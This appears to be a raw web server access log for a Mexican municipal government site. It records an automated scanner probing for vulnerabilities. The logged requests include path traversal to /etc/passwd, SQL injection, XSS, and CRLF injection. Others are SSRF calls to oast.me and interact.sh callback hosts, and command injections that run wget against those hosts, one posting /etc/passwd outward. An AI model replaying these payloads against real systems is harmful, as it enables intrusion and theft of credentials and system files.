HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:52 -0600] "GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:53 -0600] "GET /cors_proxy/https://oast.me/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:53 -0600] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:53 -0600] "GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; rv:88.0) Gecko/20100101 Firefox/88.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:54 -0600] "GET /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2095576973))%23 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:55 -0600] "GET /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:55 -0600] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 200 
25712 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:28:56 -0600] "GET /api/experimental/latest_runs HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:29:00 -0600] "GET /../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_17) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:34:25 -0600] "GET /wp-content/dup-installer/main.installer.php?is_daws=1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:44 -0600] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:46 -0600] "GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:46 -0600] "GET /uir//etc/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:47 -0600] "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 
chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:49 -0600] "GET /apisix/admin/migrate/export HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:51 -0600] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:51 -0600] "GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20cudo29mjalo72u293ingroksf9zetagpy.oast.me) HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.25" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:52 -0600] "GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.25" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:53 -0600] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.44 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:56:55 -0600] "GET /pictureproxy.php?url=http://cudo29mjalo72u293ingcp5ds9xgkef13.oast.me HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:55 -0600] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 
10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:55 -0600] "GET /access/set?param=enableapi&value=1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:55 -0600] "GET /cgi-bin/logoff.cgi HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:56 -0600] "GET /?filename=../../../../../../etc/passwd&mphb_action=download HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:56 -0600] "GET /goforms/menu HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/8.0.0 Version/17.4.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:56 -0600] "GET /password.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:56 -0600] "GET /ad-list-search?keyword&keyword&lat&lat&long&long&location&category HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:23:57 -0600] "GET 
/res/login.jsf?javax.faces.ViewState=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAKWN1ZG8yOW1qYWxvNzJ1MjkzaW5naXRzbnF4YmJoYTVyYy5vYXN0Lm1ldAAAcQB%2BAAV0AARodHRwcHh0ADBodHRwOi8vY3VkbzI5bWphbG83MnUyOTNpbmdpdHNucXhiYmhhNXJjLm9hc3QubWV4 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:25:58 -0600] "GET /_next/image?w=16&q=10&url=https://cudo29mjalo72u293ingw6zf95mtb5h5q.oast.me HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:54:52 -0600] "GET /wp-json/h5vp/v1/video/0?id='+union+all+select+concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5(999999999)),2,3,4,5,6,7,8--+- HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:54:52 -0600] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:54:53 -0600] "GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:54:55 -0600] "GET 
/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:18:54:59 -0600] "GET //interactsh.com%2f.. HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:23:43 -0600] "GET /page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://cudo29mjalo72u293ingihwym1otpyp5x.oast.me%27)%3b// HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:23:45 -0600] "GET /cache/backup/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:23:46 -0600] "GET /?Express=aaaa&autoEscape&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://cudo29mjalo72u293ingi67qgdkmntbd9.oast.me%27);// HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.17 (KHTML, like Gecko) Version/17.3.75 Safari/616.17" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:23:47 -0600] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:23:47 -0600] "GET 
/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1" 200 13905 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" chocholayucatan.gob.mx 192.185.131.128 47.128.122.107 - - [01/Feb/2025:19:33:39 -0600] "GET /index.php HTTP/2.0" 406 226 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" chocholayucatan.gob.mx 192.185.131.128 47.128.61.108 - - [01/Feb/2025:19:49:40 -0600] "GET /robots.txt HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:06 -0600] "GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:06 -0600] "GET /rest/v1/AccountService/Accounts HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:08 -0600] "GET /hax?jsp=/app/rest/server;.jsp HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:10 -0600] "GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.22" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:10 -0600] 
"GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:10 -0600] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:13 -0600] "GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('cudo29mjalo72u293ingzunup3pm9issr.oast.me')}&mgrDn=a&pwd=a HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:19:52:22 -0600] "GET /testrail/files.md5 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" chocholayucatan.gob.mx 192.185.131.128 47.128.50.167 - - [01/Feb/2025:19:57:40 -0600] "GET /robots.txt HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:21:30 -0600] "GET /img/../../../../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:21:30 -0600] "GET /admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('999999999'),5,6,7,8,9,10--+ HTTP/1.1" 406 226 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:21:32 -0600] "GET /fp-content/ HTTP/1.1" 200 25712 "-" 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:21:35 -0600] "GET /admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26" chocholayucatan.gob.mx 192.185.131.128 192.104.34.34 - - [01/Feb/2025:20:37:33 -0600] "GET / HTTP/1.1" 200 87208 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" www.chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:52 -0600] "GET /conf/nginx.conf HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:53 -0600] "POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"%f0%9f%a6%9e\":\"test\"} HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.153183" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:54 -0600] "GET /index.asp HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:54 -0600] "POST /wp-json/igd/v1/get-users-data HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:57 -0600] "GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 
chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:50:58 -0600] "GET /views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:51:10 -0600] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:20:54:51 -0600] "GET /OA_HTML/ibeCAcpSSOReg.jsp HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:19:25 -0600] "GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:19:27 -0600] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:19:28 -0600] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:19:29 -0600] "GET /current_config/Sha1Account1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 141.94.145.70 - - [01/Feb/2025:21:22:37 -0600] "GET /.env HTTP/1.1" 406 226 
"-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.109" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:25:36 -0600] "GET /processexecution/DownloadExcelFile/Domain_Credential_Report_Excel HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:25:42 -0600] "GET /processexecution/DownloadExcelFile/Infrastructure_Report_Excel HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.17" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:25:44 -0600] "GET /processexecution/DownloadExcelFile/Resolver_Report_Excel HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:21:47:39 -0600] "GET 
/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA